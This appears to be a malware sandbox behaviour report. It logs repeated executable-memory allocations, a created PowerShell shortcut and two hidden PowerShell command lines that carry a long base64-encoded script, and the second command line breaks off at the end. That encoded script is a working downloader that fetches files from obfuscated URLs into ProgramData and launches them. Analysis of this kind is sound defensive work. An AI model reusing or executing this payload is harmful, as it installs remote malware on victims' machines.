NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02677000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eeb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02663000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02664000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02666000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02668000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02669000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b73000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b74000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b75000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b76000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b77000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b78000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b79000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:25 a.m.	process_identifier: 2372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b83000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABCAHIAaQBkAGcAZQBiAG8AYQByAGQAIAA9ACAANwA0ADAAOwAkAGgAbwBtAG8AbAB5AHMAaQBzAE8AYwB0AGEAcgBjAGgAeQAgAD0AIAAzADUAOwAkAEIAcgBlAHQAZQBzAHMAZQBUAGgAZQBtAGUAcgAgAD0AIAAiAFMAeQBuAGMAZQBkACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJAB2AGkAcABlAHIAbwB1AHMARgBpAHIAbQBhAG0AZQBuAHQAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBVAEEAYgBnAEIAdgBBAEgAVQBBAGEAUQBCAHMAQQBHAHcAQQBaAFEAQgAwAEEARgBBAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEARwBVAEEAYgBnAEIAMABBAEMANABBAGMAZwBCAGwAQQBHAE0AQQBhAFEAQgB3AEEARwBVAEEAYwB3AEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADMAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQB3AEEAQQA9AD0AUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATQBRAEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAeQBBAEQASQBBAEwAZwBBADUAQQBEAGcAQQAiADsAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBADUAQQBEAEUAQQBMAHcAQgBZAEEARwA0AEEAWgBBAEEAdgBBAEQAWQBBAGEAQQBCAEQAQQBHADQAQQBjAEEAQgBWAEEARwA4AEEAWgBnAEEAPQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARwAwAEEAYwBBAEIAbgBBAEYAVQBBAFkAZwBCAHAAQQBIAEUAQQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBXAGcAQgA1AEEARABFAEEAUQBnAEIARABBAEcATQBBAFYAQQBCAHoAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AZwBlAG4AdABlAGUAbAB5ACAAaQBuACAAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBuAFUAeQAiACkAIAB7ACQAUABvAGwAeQBtAGEAdABoAHMAVQBuAGQAZQByAGwAYQBwAHAAaQBuAGcAIAA9ACAAOAAzADcAOwB0AHIAeQAgAHsAJABoAHkAZAByAG8AbAB5AHoAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBVAEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBIAEkAQQBkAFEAQgB6AEEARQBRAEEAYQBRAEIAegBBAEgAQQBBAFoAUQBCAHYAQQBIAEEAQQBiAEEAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAEwAZwBCADAAQQBHADgAQQBiAHcAQgBzAEEASABNAEEASQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBHAFUAQQBhAFEAQgB5AEEARwBVAEEAWgBBAEIAVABBAEgAVQBBAGMAQQBCAGwAQQBIAEkAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEgAVQBBAGMAZwBCAGwAQQBIAFEAQQBMAGcAQgB3AEEARwBrAEEAWQB3AEIAMABBAEgAVQBBAGMAZwBCAGwAQQBIAE0AQQAiADsAJABwAHIAZQBhAGMAYwBvAG0AbQBvAGQAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdQBuAGcAZQBuAHQAZQBlAGwAeQApACkAOwBpAHcAcgAgACQAcAByAGUAYQBjAGMAbwBtAG0AbwBkAGEAdABlACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAA7ACQAbwByAGQAdQByAG8AdQBzAG4AZQBzAHMAVABvAHAAZQByAGQAbwBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB4AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADQAQQBBAD0APQB0AGQAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBjAGcAQgBqAEEARwBnAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwBrAEEAWQB3AEIASABBAEgASQBBAFkAUQBCAHUAQQBIAFkAQQBhAFEAQgBzAEEARwB3AEEAWgBRAEEAdQBBAEcAVQBBAGIAZwBCAG4AQQBHAGsAQQBiAGcAQgBsAEEARwBVAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYgBvAG8AawBiAGkAbgBkAGUAcgBBAHMAYwBlAHIAdABhAGkAbgBtAGUAbgB0ACAAPQAgACIASABvAGwAbwBzAGkAZABlACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADQAMQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBWAEEAQgB5AEEARwBrAEEAWgB3AEIAbgBBAEcAVQBBAGMAZwBCAG0AQQBHAGsAQQBjAHcAQgBvAEEARQA4AEEAYwBnAEIAawBBAEcAOABBAGQAZwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARgBVAEEAYgBnAEIAcABBAEcAWQBBAGIAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEARwBVAEEAWgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAYQBkAHUAbAB0AGUAcgBpAHoAZQAgAD0AIAA5ADIAMwA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAEkAbgB2AGkAZwBvAHIAYQB0AG8AcgAgAD0AIAA5ADcANAA7AH0AfQAkAFUAbgBzAGUAZQBtAGwAeQAgAD0AIAA4ADMAMQA7AEEAbgBnAHUAbABhAHIAOwA="

cmdline

powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABCAHIAaQBkAGcAZQBiAG8AYQByAGQAIAA9ACAANwA0ADAAOwAkAGgAbwBtAG8AbAB5AHMAaQBzAE8AYwB0AGEAcgBjAGgAeQAgAD0AIAAzADUAOwAkAEIAcgBlAHQAZQBzAHMAZQBUAGgAZQBtAGUAcgAgAD0AIAAiAFMAeQBuAGMAZQBkACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJAB2AGkAcABlAHIAbwB1AHMARgBpAHIAbQBhAG0AZQBuAHQAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBVAEEAYgBnAEIAdgBBAEgAVQBBAGEAUQBCAHMAQQBHAHcAQQBaAFEAQgAwAEEARgBBAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEARwBVAEEAYgBnAEIAMABBAEMANABBAGMAZwBCAGwAQQBHAE0AQQBhAFEAQgB3AEEARwBVAEEAYwB3AEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADMAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQB3AEEAQQA9AD0AUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATQBRAEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAeQBBAEQASQBBAEwAZwBBADUAQQBEAGcAQQAiADsAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBADUAQQBEAEUAQQBMAHcAQgBZAEEARwA0AEEAWgBBAEEAdgBBAEQAWQBBAGEAQQBCAEQAQQBHADQAQQBjAEEAQgBWAEEARwA4AEEAWgBnAEEAPQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARwAwAEEAYwBBAEIAbgBBAEYAVQBBAFkAZwBCAHAAQQBIAEUAQQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBXAGcAQgA1AEEARABFAEEAUQBnAEIARABBAEcATQBBAFYAQQBCAHoAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AZwBlAG4AdABlAGUAbAB5ACAAaQBuACAAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBuAFUAeQAiACkAIAB7ACQAUABvAGwAeQBtAGEAdABoAHMAVQBuAGQAZQByAGwAYQBwAHAAaQBuAGcAIAA9ACAAOAAzADcAOwB0AHIAeQAgAHsAJABoAHkAZAByAG8AbAB5AHoAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBVAEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBIAEkAQQBkAFEAQgB6AEEARQBRAEEAYQBRAEIAegBBAEgAQQBBAFoAUQBCAHYAQQBIAEEAQQBiAEEAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAEwAZwBCADAAQQBHADgAQQBiAHcAQgBzAEEASABNAEEASQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBHAFUAQQBhAFEAQgB5AEEARwBVAEEAWgBBAEIAVABBAEgAVQBBAGMAQQBCAGwAQQBIAEkAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEgAVQBBAGMAZwBCAGwAQQBIAFEAQQBMAGcAQgB3AEEARwBrAEEAWQB3AEIAMABBAEgAVQBBAGMAZwBCAGwAQQBIAE0AQQAiADsAJABwAHIAZQBhAGMAYwBvAG0AbQBvAGQAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdQBuAGcAZQBuAHQAZQBlAGwAeQApACkAOwBpAHcAcgAgACQAcAByAGUAYQBjAGMAbwBtAG0AbwBkAGEAdABlACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAA7ACQAbwByAGQAdQByAG8AdQBzAG4AZQBzAHMAVABvAHAAZQByAGQAbwBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB4AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADQAQQBBAD0APQB0AGQAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBjAGcAQgBqAEEARwBnAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwBrAEEAWQB3AEIASABBAEgASQBBAFkAUQBCAHUAQQBIAFkAQQBhAFEAQgBzAEEARwB3AEEAWgBRAEEAdQBBAEcAVQBBAGIAZwBCAG4AQQBHAGsAQQBiAGcAQgBsAEEARwBVAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYgBvAG8AawBiAGkAbgBkAGUAcgBBAHMAYwBlAHIAdABhAGkAbgBtAGUAbgB0ACAAPQAgACIASABvAGwAbwBzAGkAZABlACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADQAMQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQ